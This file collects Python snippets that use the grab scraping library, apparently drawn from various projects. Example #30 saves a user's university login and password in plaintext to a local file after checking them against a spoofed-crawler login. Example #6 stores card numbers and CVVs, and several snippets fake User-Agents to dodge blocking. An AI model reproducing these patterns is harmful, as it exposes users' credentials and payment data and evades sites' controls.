Example #1
def parse_review(url, df):
    x_rating = "//span[@itemprop=\"ratingValue\"]"
    x_text = "//div[@itemprop=\"reviewBody\"]"
    x_pro = "//span[@class=\"plus\"]"
    x_con = "//span[@class=\"minus\"]"

    g = grab.Grab()
    ua = random.choice(user_agents)
    print(ua)
    g.go(url, user_agent=ua)

    rating = g.doc.select(x_rating).text()
    text = " ".join(g.doc.select(x_text).text_list())

    text = text.replace(".", ". ")
    text = text.replace(",", ", ")
    text = text.replace("!", "! ")

    try:
        pro = " ".join(g.doc.select(x_pro).text_list())
        con = " ".join(g.doc.select(x_con).text_list())
    except Exception:
        pro = float('NaN')
        con = float('NaN')
    # time.sleep(120)

    df.loc[len(df)] = [rating, text, pro, con]
    return df
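Example #1 assumes that the grab and random modules, a module-level user_agents list, and a pandas DataFrame are already set up by the caller. A minimal sketch of that surrounding context, with illustrative User-Agent strings, column names, and URL (parse_review only relies on the column order), could be:

import random

import grab
import pandas as pd

# Illustrative pool of User-Agent strings to rotate through.
user_agents = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "Mozilla/5.0 (X11; Linux x86_64)",
]

# Column names are illustrative; parse_review only relies on their order.
df = pd.DataFrame(columns=["rating", "text", "pro", "con"])
df = parse_review("http://example.com/some-review", df)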
Example #2
def parse_playlist_time(url: str) -> Tuple[int, List[Tuple[str, str]]]:
    """Parse the playlist page and sum up the durations of its videos."""

    import grab
    g = grab.Grab()

    if PROXY:
        g.setup(proxy=PROXY, proxy_type=PROXY_TYPE)

    # Send an invalid User-Agent so YouTube returns a fully rendered page
    # (the data is present in the HTML) rather than a page where the data
    # is embedded as a JavaScript object inside a script tag.
    g.setup(headers={'User-Agent': 'null'})

    g.go(url)

    video_list = g.doc.select('//*[@class="pl-video yt-uix-tile "]')
    time_list = g.doc.select('//*[@class="timestamp"]')

    total_seconds = 0
    items = []

    for title, time in zip(video_list, time_list):
        title = title.attr('data-title')
        time_str = time.text()
        items.append((title, time_str))

        total_seconds += time_to_seconds(time_str)

    return total_seconds, items
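Example #2 calls a time_to_seconds helper (and PROXY / PROXY_TYPE constants) that are not shown. A minimal sketch of the helper, consistent with the inline conversion in Example #3 below, could be:

def time_to_seconds(time_str):
    """Convert a 'H:MM:SS', 'M:SS' or 'S' timestamp into seconds."""
    seconds = 0
    for part in time_str.split(':'):
        seconds = seconds * 60 + int(part)
    return seconds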
Example #3
def count_total_playlist_time(url, proxy=None, proxy_type='http'):
    """Функция парсит страницу плейлиста и подсчитывает сумму продолжительности роликов."""

    import grab
    g = grab.Grab()
    if proxy:
        g.setup(proxy=proxy, proxy_type=proxy_type)

    g.go(url)

    video_list = g.doc.select('//*[@class="pl-video yt-uix-tile "]')
    time_list = g.doc.select('//*[@class="timestamp"]')

    total_seconds = 0

    print('Playlist:')
    for i, (video, time) in enumerate(zip(video_list, time_list), 1):
        time_str = time.text()
        print('{}. {} ({})'.format(i, video.attr('data-title'), time_str))

        time_split = time_str.split(':')
        if len(time_split) == 3:
            h, m, s = map(int, time_split)
            total_seconds += h * 60 * 60 + m * 60 + s
        elif len(time_split) == 2:
            m, s = map(int, time_split)
            total_seconds += m * 60 + s
        else:
            total_seconds += int(time_split[0])

    return total_seconds
Example #4
def gather_models(url):
    g = grab.Grab()
    g.go(url)

    links = g.doc.select(
        "//*[@id='content']/div[2]/div[2]/div[2]/div/div[3]/a")
    print(links)
Example #5
    def __init__(self,
                 user,
                 password,
                 base,
                 useragent=None,
                 transport='pycurl'):
        self.base = base
        self.user = user
        self.password = password

        self.cookie_set = False

        # Browser instance
        self.browser = grab.Grab(timeout=DEFAULT_TIMEOUT)
        self.browser.setup_transport(transport)
        if transport == "urllib3":
            import urllib3
            import certifi
            self.browser.transport.pool = urllib3.PoolManager(
                cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
        # Grab automatically handles cookies.

        # Are we anonymous?
        self.anonymous = (user == '')

        # Identify ourselves
        if useragent is not None:
            self.browser.setup(headers={'User-agent': useragent})
Example #6
    def start_button(self):
        link = self.ui.lineEdit.text()

        if re.search('https://www.supremenewyork.com/shop/(.+?)', link):

            # Getting all the values from the database to fill in the delivery information with the bot:
            db_data = DB.execute(
                'select * from USER_DATA where id=2').fetchall()

            DATA['url_1'] = link
            DATA['name'] = db_data[0][1]
            DATA['email'] = db_data[0][2]
            DATA['tel'] = db_data[0][3]
            DATA['address'] = db_data[0][4]
            DATA['city'] = db_data[0][5]
            DATA['post_code'] = db_data[0][6]
            DATA['country'] = db_data[0][7]
            DATA['card'] = db_data[0][8]
            DATA['card_number'] = db_data[0][9]
            DATA['valid_month'] = db_data[0][10]
            DATA['valid_year'] = db_data[0][11]
            DATA['cvv'] = db_data[0][12]

            if self.ui.radioButton_8.isChecked():
                DATA['size'] = 'Medium'

            elif self.ui.radioButton_9.isChecked():
                DATA['size'] = 'Large'

            elif self.ui.radioButton_10.isChecked():
                DATA['size'] = 'XLarge'

            if self.ui.radioButton.isChecked():
                DATA['img'] = 'on'

            elif self.ui.radioButton_2.isChecked():
                DATA['img'] = 'off'

            # Check proxy valid:
            if self.ui.lineEdit_12.text():
                checker = grab.Grab()
                checker.setup(proxy=self.ui.lineEdit_12.text().strip(),
                              proxy_type='http',
                              connect_timeout=5,
                              timeout=5)

                try:
                    checker.go('https://www.supremenewyork.com/')

                    DATA['proxy'] = self.ui.lineEdit_12.text().strip()

                    self.bot_thread = OrderThread()
                    self.bot_thread.start()
                except grab.GrabError:
                    self.proxy_error = ProxyError()
                    self.proxy_error.show()
            else:
                self.bot_thread = OrderThread()
                self.bot_thread.start()
Example #7
	def __getPage(self, url, hammer_mode=True):
		g = grab.Grab()
		g.setup(connect_timeout=1, timeout=3)
		g.setup(hammer_mode=hammer_mode, hammer_timeouts=(
			(3, 5), (5, 7), (7, 9), (15, 20), (50, 60)
		))
		g.go(url)
		return g.response
Example #8
 def __init__(self, config):
     self.order = config['order']
     self.grab_connect_timeout = int(config['connect_timeout'])
     self.grab_download_timeout = int(config['download_timeout'])
     self.grab = grab.Grab()
     self.grab.setup(connect_timeout=self.grab_connect_timeout,
                     timeout=self.grab_download_timeout)
     self.proxy_list_filename = ''
Example #9
 def __init__(self, workdir):
     self.workdir = workdir.rstrip(os.path.sep) + os.path.sep
     self.g = grab.Grab()
     self.g.cookies.set(name='over18',
                        value='yeah',
                        domain='.imgsrc.ru',
                        path='/',
                        expires=time.time() + 3600 * 24)
     self.go(self.host)
Example #10
 def _auth_and_get_api_key(self):
     g = grab.Grab()
     g.go(url='https://home.openweathermap.org/users/sign_in')
     g.doc.set_input('user[email]', self.user)
     g.doc.set_input('user[password]', self.password)
     g.doc.submit()
     g.go(url='https://home.openweathermap.org/api_keys')
     for i in g.doc(".//div").text_list():
         if re.match('Key Name [a-zA-Z0-9]*.*', i) is not None:
             return i.split()[2]
Example #11
def get_articles():
	g = grab.Grab()
	parser.setup_grab(g)
	
	g.go("http://it.toolbox.com")
	
	css_path = ".tile .tileContent div .floatleft a"
	
	posts = parser.get_articles(g, css_path, css_path, "ittoolbox")
	
	return posts
Example #12
def test():
    g = grab.Grab()
    g.go('http://habrahabr.ru/post/266293/')
    root_node = g.doc.tree.cssselect('.post_show')[0]
    text = hr.html_to_readable(root_node)
    path = 'out'
    if not os.path.exists(path):
        os.mkdir(path)
    outpath = os.path.join(path, 'out.log')
    with codecs.open(outpath, 'w', encoding='utf-8') as fh:
        fh.write(text)
Example #13
def get_data(url):
    df = pd.DataFrame(columns=['Time', 'Parking', 'Level', 'Option', 'Spaces'])
    update_time = datetime.datetime.now()
    html_doc = grab.Grab().go(url).body
    soup = BeautifulSoup(html_doc, 'lxml')
    structures = soup.find_all('table')
    for structure in structures:
        structure_df = get_parking(structure, update_time)
        df = df.append(structure_df, ignore_index=True)

    return df
Example #14
def login(user, password):
    g = grab.Grab()
    g.setup(post={
        "user[email]": user,
        "user[password]": password,
        "grant_type": "password",
        "authenticity_token": "undefined"
    },
            timeout=60000)
    g.go(SIGN_IN_URL)
    return g
Example #15
def gather_models(url):
    g = grab.Grab()
    g.go(url)

    links = []
    flinks = g.doc.select("//*[@id='content']/div[2]/div[2]/div/div/div[3]/a")

    for fl in flinks:
        links.append("http://irecommend.ru" + fl.attr("href"))

    # print(links)
    return links
Example #16
 def search(self,
            search_term="",
            journal_title_issn="",
            volume_year="",
            issue="",
            pages="",
            number_results=25):
     g = grab.Grab()
     request = {
         "s": search_term,
         "journalid": journal_title_issn,
         "v": volume_year,
         "i": issue,
         "p": pages,
         "redirect": "0"
     }
     if sys.version_info[0] < 3:
         url = self.url+"?"+ \
                 urllib.urlencode(request)
     else:
         url = self.url+"?"+ \
                 urllib.parse.urlencode(request)
     g.go(url)
     search_result = []
     #body > font:nth-child(7) Displayed first  100  results
     #body > font:nth-child(7) Found 1 results
     nresults = re.search(
         r'([0-9]*) results',
         g.doc.select("/html/body/font[1]").one().text())
     nresults = int(nresults.group(1))
     pages_to_load = int(math.ceil(number_results /
                                   25.0))  # Pages needed to be loaded
     # Check if the pages needed to be loaded are more than the pages available
     if pages_to_load > int(math.ceil(nresults / 25.0)):
         pages_to_load = int(math.ceil(nresults / 25.0))
     for page in range(1, pages_to_load + 1):
         if len(search_result) > number_results:  # Check if we got all the results
             break
         url = ""
         request.update({"page": page})
         if sys.version_info[0] < 3:
             url = self.url+"?"+ \
                 urllib.urlencode(request)
         else:
             url = self.url+"?"+ \
                 urllib.parse.urlencode(request)
         g.go(url)
         search_result += self.__parse(g)
         if page != pages_to_load:
             # Random delay because if you ask a lot of pages,your ip might get blocked.
             time.sleep(random.randint(250, 1000) / 1000.0)
     return search_result[:number_results]
Example #17
 def __init__(self, **kwargs):
     self.result = None
     self.g = grab.Grab(timeout=5, connect_timeout=5, user_agent='METASCAN')
     page_type = self.determine_page_type(self.search_url.format(**kwargs))
     logger.info(page_type)
     if page_type == 'error':
         self.result = None
     elif page_type == 'search_page':
         self.search_page(**kwargs)
         self.result = self.make_json_from_page()
     elif page_type == 'vulns_page':
         self.vulns_page()
         self.result = self.make_json_from_page()
Example #18
    def setup_grab(self):
        self.grab = grab.Grab()

        self.current_proxy = random.choice(self.proxy_list)
        first_slash_index = self.current_proxy['_id'].find('/')
        proxy_type = self.current_proxy['_id'][:first_slash_index - 1]
        proxy_address = self.current_proxy['_id'][first_slash_index + 2:]
        proxy_lag = self.current_proxy['latency']

        self.grab.setup(connect_timeout=self.grab_connect_timeout + proxy_lag,
                        timeout=self.grab_download_timeout + proxy_lag,
                        proxy=proxy_address,
                        proxy_type=proxy_type)
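The index arithmetic in Example #18 is easier to follow with a concrete value. Assuming proxy records shaped like {'_id': 'http://1.2.3.4:8080', 'latency': 0.4} (the exact shape is an assumption, it is not shown in the snippet), the slicing works out as:

record = {'_id': 'http://1.2.3.4:8080', 'latency': 0.4}  # assumed shape
i = record['_id'].find('/')             # 5, the first slash of '//'
proxy_type = record['_id'][:i - 1]      # 'http'  (the trailing ':' is dropped)
proxy_address = record['_id'][i + 2:]   # '1.2.3.4:8080'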
Example #19
def process_url(url):
    logger.info('Processing %s...' % url)

    g = grab.Grab()
    resp = g.go(url)

    links = []
    for found_url in parser.parse_urls(resp.body.decode()):
        logger.info('Found URL: %s' % found_url)
        links.append(found_url)

    if links:
        io.save_links(url, links)
Example #20
def del4flash():
    g = grab.Grab()
    g.go('http://172.25.63.1/myconnect/')
    text = g.css_text('body')
    text = text.split()
    already = 0
    # Skip everything up to and including the 'Size' column header; each
    # remaining whitespace-separated token is treated as a file name and
    # removed with an HTTP DELETE request.
    for i in range(len(text)):
        if text[i] == 'Size' or already == 1:
            if already == 0:
                already = 1
                continue
            else:
                r = requests.delete('http://172.25.63.1/myconnect/' + text[i])
Example #21
def gather_reviews(url, proxy):
    g = grab.Grab()
    # g.setup(proxy=proxy)
    g.go(url)

    links = []
    flinks = g.doc.select(
        "//*[@id=\"quicktabs_tabpage_12388_myreviewinfo\"]/div/div/div/ul/li/div/div/p/nobr/a"
    )
    "//*[@id=\"quicktabs_tabpage_12388_myreviewinfo\"]/div/div[1]/div/ul/li/div/div/p/nobr/a"
    for fl in flinks:
        print(fl)
        links.append("http://irecommend.ru" + fl.attr("href"))

    return links
Example #22
def main():
    settings.init()
    settings.logger = log.Log(settings.log_file_name)
    settings.logger.daemon = True
    settings.logger.start()
    settings.logger.log(
        'Starting grabber {name}'.format(name=settings.irc_nick))

    tools.create_dir(settings.dir_ready)
    tools.create_dir(settings.dir_new_lists)
    tools.create_dir(settings.dir_old_lists)

    if not os.path.isfile(settings.target_main):
        raise Exception(
            "Please add a rsync target to file '{settings.target_main}'.".
            format(**locals()))

    settings.irc_bot = irc.IRC()
    settings.irc_bot.daemon = True
    settings.irc_bot.start()
    time.sleep(30)
    settings.upload = upload.Upload()
    settings.upload.daemon = True
    settings.upload.start()
    settings.grab = grab.Grab()
    settings.grab.daemon = True
    settings.grab.start()

    while settings.running:
        #    if not settings.logger.isAlive():
        #        print('The logger stopped running...')
        #        settings.irc_bot.send('PRIVMSG', 'The logger stopped running...',
        #                settings.irc_channel_bot)
        #        settings.running = False
        #    if not settings.irc_bot.isAlive():
        #        print('The IRC bot stopped running...')
        #        settings.running = False
        #    if not settings.upload.isAlive():
        #        print('The uploader stopped running...')
        #        settings.irc_bot.send('PRIVMSG', 'The uploader stopped running...',
        #                settings.irc_channel_bot)
        #        settings.running = False
        #    if not settings.grab.isAlive():
        #        print('The grabber stopped running...')
        #        settings.irc_bot.send('PRIVMSG', 'The grabber stopped working...',
        #                settings.irc_channel_bot)
        #        settings.running = False
        time.sleep(1)
Example #23
 def _get(self, url, **kwargs):
     grabber = grab.Grab()
     grabber.reset()
     grabber.setup(
         connect_timeout=5,
         timeout=300,
         hammer_mode=True,
         hammer_timeouts=((300, 360), (360, 420), (420, 480)),
     )
     if kwargs:
         grabber.setup(**kwargs)
     if self.proxy_enabled:
         if hasattr(self, 'proxy'):
             grabber.setup(proxy=self.proxy, proxy_type='http')
         if hasattr(self, 'proxy_auth'):
             grabber.setup(proxy_userpwd=self.proxy_auth)
     grabber.go(url)
     return grabber.response.body
Example #24
async def prx_srv(proxies):
    while True:
        proxy_for_parser = await proxies.get()
        print('start_proxy_for_parser')
        print('Found proxy: %s' % proxy_for_parser)
        g = grab.Grab()
        print('1')
        g.setup(proxy=proxy_for_parser.host + ':' + str(proxy_for_parser.port),
                proxy_type='http')
        print('2')
        try:
            g.go('http://www.google.com/search?q=Spam')
        except Exception:
            pass
        print('2.1')
        print(g.doc.url)
        print('3')
        proxy_for_parser = await proxies.get()
Example #25
def parse_article_image(article, site_url=''):
    try:
        img = article.cssselect('img:first-child')[0]
        img.set('class', '')
        img.set('id', '')
        img.set('align', '')
        img.set('src', absolutize_link(img.get('src', ''), site_url))
        return tostring(img).strip()
    except IndexError:
        return b''
    except AttributeError:
        try:
            img = grab.Grab(article).css_one('img:first-child')
        except GrabError:
            return b''
        img.set('class', '')
        img.set('id', '')
        img.set('align', '')
        img.set('src', absolutize_link(img.get('src'), site_url))
        return tostring(img).strip()
Example #26
def get_articles():
	g = grab.Grab()
	parser.setup_grab(g)
	
	g.go('http://planet.clojure.in')
	
	css_path = '.entry .article > h2 a'
	summary_texts = []
	for elem in g.css_list(".entry .article"):
		text = ''
		for children in elem.getchildren()[1:-1]:
			text += parser.remove_bad_tags(tostring(children).decode())
		summary_texts.append(text)
			
	posts = parser.get_articles(g, css_path, css_path,
		'planetclojure', 'planet.clojure.in')
	
	for (post, summary_text) in zip(posts, summary_texts):
		post['summary'] = summary_text
	
	return posts
Example #27
        def search(self, search_term="", pages="", number_results=25):
            # TODO: Add Batch search for comics.
            g = grab.Grab()
            request = {"s": search_term, "p": pages}
            if sys.version_info[0] < 3:
                url = self.url+"?"+ \
                        urllib.urlencode(request)
            else:
                url = self.url+"?"+ \
                        urllib.parse.urlencode(request)
            g.go(url)
            search_result = []
            nresults = re.search(
                r'([0-9]*) results',
                g.doc.select("/html/body/font[1]").one().text())

            nresults = int(nresults.group(1))
            pages_to_load = int(math.ceil(number_results /
                                          25.0))  # Pages needed to be loaded
            # Check if the pages needed to be loaded are more than the pages available
            if pages_to_load > int(math.ceil(nresults / 25.0)):
                pages_to_load = int(math.ceil(nresults / 25.0))
            for page in range(1, pages_to_load + 1):
                if len(search_result) > number_results:  # Check if we got all the results
                    break
                url = ""
                request.update({"page": page})
                if sys.version_info[0] < 3:
                    url = self.url+"?"+ \
                        urllib.urlencode(request)
                else:
                    url = self.url+"?"+ \
                        urllib.parse.urlencode(request)
                g.go(url)
                search_result += self.__parse(g)
                if page != pages_to_load:
                    # Random delay because if you ask a lot of pages,your ip might get blocked.
                    time.sleep(random.randint(250, 1000) / 1000.0)
            return search_result[:number_results]
Example #28
 def __choose_mirror(self):
     g = grab.Grab()
     if self.mirrors is None:
         raise MissingMirrorsError("There are no mirrors!")
     if isinstance(self.mirrors, str):
         self.mirrors = [self.mirrors]
     last = len(self.mirrors) - 1
     for i, mirror in enumerate(self.mirrors):
         try:
             url = mirror
             g.go(url)
             self.__selected_mirror = mirror
             categories = g.doc(
                 "//input[contains(@name,'lg_topic')]").node_list()
             for category in categories:
                 if category.attrib["value"] == "libgen":
                     self.libgen = self.__Libgen(
                         g.make_url_absolute(
                             category.getnext().attrib["href"]))
                 elif category.attrib["value"] == "scimag":
                     self.scimag = self.__Scimag(
                         g.make_url_absolute(
                             category.getnext().attrib["href"]))
                 elif category.attrib["value"] == "fiction":
                     self.fiction = self.__Fiction(
                         g.make_url_absolute(
                             category.getnext().attrib["href"]))
                 elif category.attrib["value"] == "comics":
                     self.comics = self.__Comics(
                         g.make_url_absolute(
                             category.getnext().attrib["href"]))
             break
         except grab.GrabError:
             if i == last:
                 raise MirrorsNotResolvingError("None of the mirrors are resolving; check " + \
                                                "that they are correct and that you have a connection!")
Example #29
 def search(self, search_term, column="title", number_results=25):
     g = grab.Grab()
     request = {"req": search_term, "column": column}
     if sys.version_info[0] < 3:
         url = self.url+"/search.php?"+ \
                 urllib.urlencode(request)
     else:
         url = self.url+"/search.php?"+ \
                 urllib.parse.urlencode(request)
     g.go(url)
     search_result = []
     nbooks = re.search(
         r'([0-9]*) (books|files)',
         g.doc.select("/html/body/table[2]/tr/td[1]/font").text())
     nbooks = int(nbooks.group(1))
     pages_to_load = int(math.ceil(number_results /
                                   25.0))  # Pages needed to be loaded
     # Check if the pages needed to be loaded are more than the pages available
     if pages_to_load > int(math.ceil(nbooks / 25.0)):
         pages_to_load = int(math.ceil(nbooks / 25.0))
     for page in range(1, pages_to_load + 1):
         if len(search_result) > number_results:  # Check if we got all the results
             break
         url = ""
         request.update({"page": page})
         if sys.version_info[0] < 3:
             url = self.url+"/search.php?"+ \
                 urllib.urlencode(request)
         else:
             url = self.url+"/search.php?"+ \
                 urllib.parse.urlencode(request)
         g.go(url)
         search_result += self.__parse(g.doc)
         if page != pages_to_load:
             # Random delay because if you ask a lot of pages,your ip might get blocked.
             time.sleep(random.randint(250, 1000) / 1000.0)
     return search_result[:number_results]
Example #30
def login(request):
    uname = request.POST.get("username")
    pwd = request.POST.get("password")

    g = grab.Grab(timeout=30,user_agent="Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)")
    g.go("https://login.uci.edu/ucinetid/webauth")
    g.doc.set_input('ucinetid', uname)
    g.doc.set_input('password', pwd)
    resp = g.doc.submit()

    mySoup = BeautifulSoup(resp.body, "html.parser")
    s = mySoup.find("div", {"id": "error-message"})
    try:
        return render(request,"login.html",{"data":[s.get_text()]})
    except AttributeError:  # no error-message div -> login succeeded
        f = open("encript.txt", 'w')
        f.write(uname)
        f.write(",")
        f.write(pwd)
        f.close()
    return render(request, "search.html")